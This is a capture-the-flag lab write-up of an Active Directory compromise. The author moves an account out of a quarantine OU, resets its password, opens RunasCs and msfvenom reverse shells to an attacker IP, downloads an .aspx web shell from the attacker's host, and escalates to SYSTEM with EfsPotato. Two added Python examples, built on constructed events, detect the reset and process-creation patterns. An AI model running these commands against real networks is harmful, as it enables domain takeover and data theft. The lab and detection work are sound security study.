⠀⠀⠀⠀⠀⠀⢀⡴⠚⠉⢣⡙⢦⡀⠀⠀⢀⡰⢋⡜⠉⠓⠦⣀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡴⠁⢀⣀⣀⣀⣙⣦⣉⣉⣋⣉⣴⣋⣀⣀⣀⡀⠈⢧⠀⠀⠀⠀⠀
⠀⠀⠀⠀⡸⠁⠀⢸⠀⠀⠀⠀⢀⣔⡛⠛⡲⡀⠀⠀⠀⠀⡇⠀⠈⢇⠀⠀⠀⠀
⠀⠀⠀⢠⠇⠀⠀⠸⡀⠀⠀⠀⠸⣼⠽⠯⢧⠇⠀⠀⠀⠀⡇⠀⠀⠘⡆⠀⠀⠀
⠀⠀⠀⣸⠀⠀⠀⠀⡇⠀⠀⠀⠳⢼⡦⢴⡯⠞⠀⠀⠀⢰⠀⠀⠀⠀⢧⠀⠀⠀
⠀⠀⠀⢻⠀⠀⠀⠀⡇⠀⠀⠀⢀⡤⠚⠛⢦⣀⠀⠀⠀⢸⠀⠀⠀⠀⡼⠀⠀⠀
⠀⠀⠀⠈⠳⠤⠤⣖⣓⣒⣒⣒⣓⣒⣒⣒⣒⣚⣒⣒⣒⣚⣲⠤⠤⠖⠁⠀⠀⠀
⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
*Evil-WinRM* PS C:\Users\sam.brooks\Desktop>
● Move web_admin from Quarantine to CityOps and reset the password to get access to it
I remembered about the .aspx files for the web server. However, being connected as user sam.brooks didn’t allow me to upload the required file. I verified the permissions and concluded I needed access as web_admin.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ACL -Path .\test.aspx | Format-Table -Wrap
Directory: C:\inetpub\wwwroot\uploads
Path Owner Access
---- ----- ------
test.aspx BUILTIN\Administrators BUILTIN\IIS_IUSRS Allow ReadAndExecute, Synchronize
CITY\web_admin Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadAndExecute, Synchronize
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ACL -Path . | Format-Table -Wrap
Directory: C:\inetpub\wwwroot
Path Owner Access
---- ----- ------
uploads BUILTIN\Administrators BUILTIN\IIS_IUSRS Allow ReadAndExecute, Synchronize
BUILTIN\IIS_IUSRS Allow ReadAndExecute, Synchronize
CITY\web_admin Allow Modify, Synchronize
BUILTIN\IIS_IUSRS Allow -1610612736
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow ReadAndExecute, Synchronize
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
I tried to get the Kerberos hash, but, unfortunately, couldn’t crack it. So I returned to what I saw in BloodHound for emma.hayes and started to investigate the permissions on those OUs.
First, I got the DistinguishedName property for the OUs.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADOrganizationalUnit -Filter 'Name -eq "CITYOPS"' | Select Name, DistinguishedName
Name DistinguishedName
---- -----------------
CityOps OU=CityOps,DC=city,DC=local
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADOrganizationalUnit -Filter 'Name -eq "QUARANTINE"' | Select Name, DistinguishedName
Name DistinguishedName
---- -----------------
Quarantine OU=Quarantine,DC=city,DC=local
Then, I verified the access Emma had on those.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> (Get-Acl -Path "AD:\OU=Quarantine,DC=city,DC=local").Access | Where-Object 'IdentityReference' -like '*emma*' | Select ActiveDirectoryRights, InheritanceType, AccessControlType, IdentityReference, IsInherited | Format-Table -Wrap
ActiveDirectoryRights InheritanceType AccessControlType IdentityReference IsInherited
--------------------- --------------- ----------------- ----------------- -----------
ReadProperty, WriteProperty, GenericExecute All Allow CITY\emma.hayes False
CreateChild, DeleteChild Descendents Allow CITY\emma.hayes False
CreateChild, DeleteChild All Allow CITY\emma.hayes False
CreateChild, DeleteChild Descendents Allow CITY\emma.hayes False
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> (Get-Acl -Path "AD:\OU=CityOps,DC=city,DC=local").Access | Where-Object 'IdentityReference' -like '*emma*' | Select ActiveDirectoryRights, InheritanceType, AccessControlType, IdentityReference, IsInherited | Format-Table -Wrap
ActiveDirectoryRights InheritanceType AccessControlType IdentityReference IsInherited
--------------------- --------------- ----------------- ----------------- -----------
GenericAll All Allow CITY\emma.hayes False
WriteDacl All Allow CITY\emma.hayes False
Next, I got the info about web_admin.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADUser -Identity web_admin
DistinguishedName : CN=Web Admin,OU=Quarantine,DC=city,DC=local
Enabled : True
GivenName :
Name : Web Admin
ObjectClass : user
ObjectGUID : d0eac22e-8e85-49d2-a287-dfdeabd35707
SamAccountName : web_admin
SID : S-1-5-21-407732331-1521580060-1819249925-1107
Surname :
UserPrincipalName : [email protected]
Finally, I got the access Emma had on it.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> (Get-Acl -Path "AD:\CN=Web Admin,OU=Quarantine,DC=city,DC=local").Access | Where-Object {$_.IdentityReference -like "*emma.hayes*"} | Select-Object ActiveDirectoryRights, InheritanceType, AccessControlType, IdentityReference, IsInherited | Format-Table
ActiveDirectoryRights InheritanceType AccessControlType IdentityReference IsInherited
--------------------- --------------- ----------------- ----------------- -----------
CreateChild, DeleteChild All Allow CITY\emma.hayes True
CreateChild, DeleteChild All Allow CITY\emma.hayes True
CreateChild, DeleteChild All Allow CITY\emma.hayes True
ReadProperty, WriteProperty, GenericExecute All Allow CITY\emma.hayes True
I proceeded with moving web_admin from Quarantine to CityOps.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> $emma_pass = ConvertTo-SecureString <REDACTED> -AsPlainText -Force
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> $emma_cred = New-Object System.Management.Automation.PSCredential('city.local\emma.hayes', $emma_pass)
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Move-ADObject -Identity "CN=Web Admin,OU=Quarantine,DC=city,DC=local" -TargetPath "OU=CityOps,DC=city,DC=local" -Credential $emma_cred
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADUser -Identity web_admin
DistinguishedName : CN=Web Admin,OU=CityOps,DC=city,DC=local
Enabled : True
GivenName :
Name : Web Admin
ObjectClass : user
ObjectGUID : d0eac22e-8e85-49d2-a287-dfdeabd35707
SamAccountName : web_admin
SID : S-1-5-21-407732331-1521580060-1819249925-1107
Surname :
UserPrincipalName : [email protected]
Once that step was completed and verified, I reset the password and tested it.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodyAD -u 'emma.hayes' -p <REDACTED> -d 'city.local' --host 10.1.65.124 set password 'web_admin' 'Password123'
[+] Password changed successfully!
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u web_admin -p 'Password123'
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\web_admin:Password123
However, there was still a big issue. Although I had the password for it, I couldn’t remotely connect to that user because it was lacking the proper group memberships. I started a netcat listener, then uploaded RunasCs.exe in C:\Temp from the terminal I had as sam.brooks.
*Evil-WinRM* PS C:\Temp> upload RunasCs.exe
Info: Uploading /home/rootshellace/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil/RunasCs.exe to C:\Temp\RunasCs.exe
Data: 68948 bytes of 68948 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 9:08 AM 2548 dc_user_rights.inf
-a---- 11/28/2025 12:57 PM 5296 privs.inf
-a---- 6/28/2026 4:01 AM 51712 RunasCs.exe
-a---- 10/24/2025 9:08 AM 16384 secedit.jfm
-a---- 10/24/2025 9:08 AM 1048576 secedit.sdb
After that, I executed RunasCs.exe and launched a reverse shell.
*Evil-WinRM* PS C:\Temp> .\RunasCs.exe web_admin Password123 powershell.exe -r <MY_VPN_IP>:4444
[*] Warning: User profile directory for user web_admin does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'web_admin' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-14f5d16$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2676 created in background.
In the terminal where I previously started the netcat listener, I got access as web_admin.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.1.65.124 50330
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
city\web_admin
PS C:\Windows\system32>
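The directory changes made with emma.hayes in this section and the previous one (the DACL write on CityOps, re-enabling and resetting sam.brooks, moving web_admin out of Quarantine and resetting it) each map to a Security-log event on the domain controller. The Python below is an added detection example, not part of the original writeup: it ties every password reset to the changes the same actor made shortly before it. The events are constructed samples keyed by Security-log field names; WINDOW, the helpdesk.example account and the function names are assumptions.

```python
"""Tie password resets to the directory changes that set them up (added example)."""
from datetime import datetime, timedelta

QUARANTINE_BASE = "ou=quarantine,dc=city,dc=local"   # the containment OU named on this page
WINDOW = timedelta(minutes=30)                        # assumption: tune per environment

# Constructed sample events, not the lab's logs. Event IDs: 4722 account enabled,
# 4724 password reset attempt, 5136 directory object modified, 5139 directory object moved.
# 5136 and 5139 require directory-change auditing and a SACL on the objects.
EVENTS = [
    # Routine reset by a hypothetical helpdesk account, nothing leading up to it.
    {"EventID": 4724, "TimeCreated": "2026-01-01T09:00:00",
     "SubjectUserName": "helpdesk.example", "TargetUserName": "maria.clerk"},
    {"EventID": 5136, "TimeCreated": "2026-01-01T10:00:00", "SubjectUserName": "emma.hayes",
     "ObjectDN": "OU=CityOps,DC=city,DC=local", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4722, "TimeCreated": "2026-01-01T10:02:00",
     "SubjectUserName": "emma.hayes", "TargetUserName": "sam.brooks"},
    {"EventID": 4724, "TimeCreated": "2026-01-01T10:03:00",
     "SubjectUserName": "emma.hayes", "TargetUserName": "sam.brooks"},
    {"EventID": 5139, "TimeCreated": "2026-01-01T11:00:00", "SubjectUserName": "emma.hayes",
     "OldObjectDN": "CN=Web Admin,OU=Quarantine,DC=city,DC=local",
     "NewObjectDN": "CN=Web Admin,OU=CityOps,DC=city,DC=local"},
    {"EventID": 4724, "TimeCreated": "2026-01-01T11:01:00",
     "SubjectUserName": "emma.hayes", "TargetUserName": "web_admin"},
]


def when(event):
    return datetime.fromisoformat(event["TimeCreated"])


def under(dn, base):
    """True if dn sits below base. Simplified: case-insensitive suffix match,
    which does not handle escaped commas inside RDN values."""
    return dn.lower().endswith("," + base)


def precursor(ev, reset):
    """Name the change if ev, made by the resetting actor within WINDOW before the
    reset, could have set that reset up; otherwise return None."""
    if ev["SubjectUserName"].lower() != reset["SubjectUserName"].lower():
        return None
    if not timedelta(0) <= when(reset) - when(ev) <= WINDOW:
        return None
    eid = ev["EventID"]
    # 4722 names its target by account name, so it can be matched to the reset target.
    if eid == 4722 and ev["TargetUserName"].lower() == reset["TargetUserName"].lower():
        return "account-enabled"
    # 5139 and 5136 name objects by DN, so they are matched by actor and time only.
    if (eid == 5139 and under(ev["OldObjectDN"], QUARANTINE_BASE)
            and not under(ev["NewObjectDN"], QUARANTINE_BASE)):
        return "moved-out-of-quarantine"
    if eid == 5136 and ev["AttributeLDAPDisplayName"].lower() == "ntsecuritydescriptor":
        return "dacl-modified"
    return None


def reset_findings(events):
    """Report resets of another account that follow a containment or ACL change."""
    findings = []
    for reset in events:
        if reset["EventID"] != 4724:
            continue
        if reset["SubjectUserName"].lower() == reset["TargetUserName"].lower():
            continue
        kinds = sorted({k for k in (precursor(ev, reset) for ev in events) if k})
        if kinds:
            findings.append({"actor": reset["SubjectUserName"],
                             "target": reset["TargetUserName"],
                             "time": reset["TimeCreated"],
                             "precursors": kinds})
    return findings


if __name__ == "__main__":
    for finding in reset_findings(EVENTS):
        print(finding)
```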
● Pivoting to defaultapppool
Once I got access as web_admin, I went to the website uploads directory to place the .aspx reverse shell (available here). Of course, in a different terminal, I started another netcat listener, to have it prepared. Using PowerShell and a local Python web server, I uploaded the required file.
PS C:\inetpub\wwwroot\uploads> dir
dir
Directory: C:\inetpub\wwwroot\uploads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 11:23 AM 1218 test.aspx
PS C:\inetpub\wwwroot\uploads> Invoke-WebRequest -Uri "http://<MY_VPN_IP>:8000/hack.aspx" -OutFile "C:\inetpub\wwwroot\uploads\hack.aspx"
Invoke-WebRequest -Uri "http://<MY_VPN_IP>:8000/hack.aspx" -OutFile "C:\inetpub\wwwroot\uploads\hack.aspx"
PS C:\inetpub\wwwroot\uploads> dir
dir
Directory: C:\inetpub\wwwroot\uploads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/28/2026 4:45 AM 15970 hack.aspx
-a---- 10/24/2025 11:23 AM 1218 test.aspx
PS C:\inetpub\wwwroot\uploads>
In my browser, I accessed the page (http://city.local/uploads/hack.aspx) and, in that way, triggered the execution of the malicious file, which granted me access.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $nc -lnvp 5555
Listening on 0.0.0.0 5555
Connection received on 10.1.65.124 50499
Spawn Shell...
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
● Abuse privileges and get full access
The first thing I did after I got access as defaultapppool was to check which privileges were assigned to that user. It had SeImpersonatePrivilege, which was a good attack vector.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
c:\windows\system32\inetsrv>
I looked for available exploits that abuse that privilege. Initially, I tried PrintSpoofer.exe, but it didn’t work. Next, I uploaded and compiled EfsPotato.cs (available here), according to the instructions provided by its developer.
C:\Temp>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
Microsoft (R) Visual C# Compiler version 4.7.3190.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
C:\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is CCCC-FB95
Directory of C:\Temp
06/28/2026 05:10 AM <DIR> .
06/28/2026 05:10 AM <DIR> ..
10/24/2025 09:08 AM 2,548 dc_user_rights.inf
06/28/2026 05:05 AM 25,441 EfsPotato.cs
06/28/2026 05:10 AM 17,920 EfsPotato.exe
06/28/2026 04:59 AM 27,136 PrintSpoofer64.exe
11/28/2025 01:57 PM 5,296 privs.inf
06/28/2026 04:01 AM 51,712 RunasCs.exe
10/24/2025 09:08 AM 16,384 secedit.jfm
10/24/2025 09:08 AM 1,048,576 secedit.sdb
06/28/2026 04:19 AM 11,076,096 winPEASx64.exe
9 File(s) 12,271,109 bytes
2 Dir(s) 34,349,150,208 bytes free
Next, I created an executable for another reverse shell, using msfvenom.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $msfvenom -p windows/x64/shell_reverse_tcp LHOST=<MY_VPN_IP> LPORT=7777 -f exe > syshack_shell.exe
I uploaded it via the same connection I had as sam.brooks. I also started another netcat listener.
*Evil-WinRM* PS C:\Temp> upload syshack_shell.exe
Info: Uploading /home/rootshellace/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil/syshack_shell.exe to C:\Temp\syshack_shell.exe
Data: 10240 bytes of 10240 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 9:08 AM 2548 dc_user_rights.inf
-a---- 6/28/2026 5:05 AM 25441 EfsPotato.cs
-a---- 6/28/2026 5:10 AM 17920 EfsPotato.exe
-a---- 6/28/2026 4:59 AM 27136 PrintSpoofer64.exe
-a---- 11/28/2025 12:57 PM 5296 privs.inf
-a---- 6/28/2026 4:01 AM 51712 RunasCs.exe
-a---- 10/24/2025 9:08 AM 16384 secedit.jfm
-a---- 10/24/2025 9:08 AM 1048576 secedit.sdb
-a---- 6/28/2026 5:45 AM 7680 syshack_shell.exe
-a---- 6/28/2026 5:31 AM 14 test_user.txt
-a---- 6/28/2026 4:19 AM 11076096 winPEASx64.exe
Once uploaded, I executed EfsPotato.exe to trigger the reverse shell with elevated permissions.
C:\Temp>.\EfsPotato.exe "cmd.exe /c C:\Temp\syshack_shell.exe"
.\EfsPotato.exe "cmd.exe /c C:\Temp\syshack_shell.exe"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: IIS APPPOOL\DefaultAppPool
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=109ff80)
[+] Get Token: 860
[!] process with pid: 2068 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818
I went back to my terminal with the listener and I saw I got System access. Finally, I went inside the Desktop directory of the Administrator account and read the root flag.
└──╼ $nc -lnvp 7777
Listening on 0.0.0.0 7777
Connection received on 10.1.65.124 50695
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Temp>whoami
whoami
nt authority\system
C:\Temp>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is CCCC-FB95
Directory of C:\Users\Administrator\Desktop
02/27/2026 07:55 AM <DIR> .
02/27/2026 07:55 AM <DIR> ..
10/24/2025 11:53 AM 1,230 root.txt
1 File(s) 1,230 bytes
2 Dir(s) 34,347,618,304 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
<REDACTED_FLAG>
⠀⠀⠀⠀⠀⣀⣠⠤⠶⠶⣖⡛⠛⠿⠿⠯⠭⠍⠉⣉⠛⠚⠛⠲⣄⠀⠀⠀⠀⠀
⠀⠀⢀⡴⠋⠁⠀⡉⠁⢐⣒⠒⠈⠁⠀⠀⠀⠈⠁⢂⢅⡂⠀⠀⠘⣧⠀⠀⠀⠀
⠀⠀⣼⠀⠀⠀⠁⠀⠀⠀⠂⠀⠀⠀⠀⢀⣀⣤⣤⣄⡈⠈⠀⠀⠀⠘⣇⠀⠀⠀
⢠⡾⠡⠄⠀⠀⠾⠿⠿⣷⣦⣤⠀⠀⣾⣋⡤⠿⠿⠿⠿⠆⠠⢀⣀⡒⠼⢷⣄⠀
⣿⠊⠊⠶⠶⢦⣄⡄⠀⢀⣿⠀⠀⠀⠈⠁⠀⠀⠙⠳⠦⠶⠞⢋⣍⠉⢳⡄⠈⣧
⢹⣆⡂⢀⣿⠀⠀⡀⢴⣟⠁⠀⢀⣠⣘⢳⡖⠀⠀⣀⣠⡴⠞⠋⣽⠷⢠⠇⠀⣼
⠀⢻⡀⢸⣿⣷⢦⣄⣀⣈⣳⣆⣀⣀⣤⣭⣴⠚⠛⠉⣹⣧⡴⣾⠋⠀⠀⣘⡼⠃
⠀⢸⡇⢸⣷⣿⣤⣏⣉⣙⣏⣉⣹⣁⣀⣠⣼⣶⡾⠟⢻⣇⡼⠁⠀⠀⣰⠋⠀⠀
⠀⢸⡇⠸⣿⡿⣿⢿⡿⢿⣿⠿⠿⣿⠛⠉⠉⢧⠀⣠⡴⠋⠀⠀⠀⣠⠇⠀⠀⠀
⠀⢸⠀⠀⠹⢯⣽⣆⣷⣀⣻⣀⣀⣿⣄⣤⣴⠾⢛⡉⢄⡢⢔⣠⠞⠁⠀⠀⠀⠀
⠀⢸⠀⠀⠀⠢⣀⠀⠈⠉⠉⠉⠉⣉⣀⠠⣐⠦⠑⣊⡥⠞⠋⠀⠀⠀⠀⠀⠀⠀
⠀⢸⡀⠀⠁⠂⠀⠀⠀⠀⠀⠀⠒⠈⠁⣀⡤⠞⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠙⠶⢤⣤⣤⣤⣤⡤⠴⠖⠚⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
C:\Users\Administrator\Desktop>
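From the defender's side, the chain above leaves three recognizable process-creation patterns: the IIS worker starting a shell, the app pool identity running csc.exe outside of ASP.NET's own compilation, and a SYSTEM process whose parent runs as the app pool. The following is an added example, not part of the original lab or any tool used in it; the events are constructed, the field names are modeled on Sysmon Event ID 1 as an assumed log source, and the rule names are hypothetical.

```python
import ntpath

APPPOOL = "iis apppool\\"
SHELLS = {"cmd.exe", "powershell.exe"}

def ev(image, parent, user, parent_user):
    # Field names modeled on Sysmon Event ID 1 (assumed log source).
    return {"Image": image, "ParentImage": parent,
            "User": user, "ParentUser": parent_user}

POOL, SYSTEM = r"IIS APPPOOL\DefaultAppPool", r"NT AUTHORITY\SYSTEM"
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
CMD = r"C:\Windows\System32\cmd.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

# Constructed sample events: three mirror the chain above, two are benign.
EVENTS = [
    ev(CMD, W3WP, POOL, POOL),                        # .aspx page starts a shell
    ev(CSC, CMD, POOL, POOL),                         # compiler run from that shell
    ev(CMD, r"C:\Temp\EfsPotato.exe", SYSTEM, POOL),  # SYSTEM child of app pool
    ev(CSC, W3WP, POOL, POOL),                        # normal ASP.NET compilation
    ev(r"C:\Windows\System32\svchost.exe",
       r"C:\Windows\System32\services.exe", SYSTEM, SYSTEM),
]

def base(path):
    return ntpath.basename(path).lower()

def classify(e):
    """Return the rule names one process-creation event matches."""
    child, parent = base(e["Image"]), base(e["ParentImage"])
    user, parent_user = e["User"].lower(), e["ParentUser"].lower()
    hits = []
    if parent == "w3wp.exe" and child in SHELLS:
        hits.append("w3wp_spawned_shell")
    # w3wp.exe -> csc.exe is expected; csc.exe under any other parent is not.
    if user.startswith(APPPOOL) and child == "csc.exe" and parent != "w3wp.exe":
        hits.append("apppool_compiler_outside_w3wp")
    # A SYSTEM child under an app pool parent means a token changed hands.
    if parent_user.startswith(APPPOOL) and user == SYSTEM.lower():
        hits.append("apppool_parent_system_child")
    return hits

def detect(events):
    return [(i, rule) for i, e in enumerate(events) for rule in classify(e)]

if __name__ == "__main__":
    for index, rule in detect(EVENTS):
        print(index, rule, EVENTS[index]["Image"])
```

The fourth event shows why the compiler rule keys on the parent: ASP.NET itself launches csc.exe from w3wp.exe, so alerting on csc.exe alone would be noisy.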
If you got here, I want to thank you for the time you took to read my article. I hope you enjoyed it and also learned something from it. Why not take a look at some of my other articles?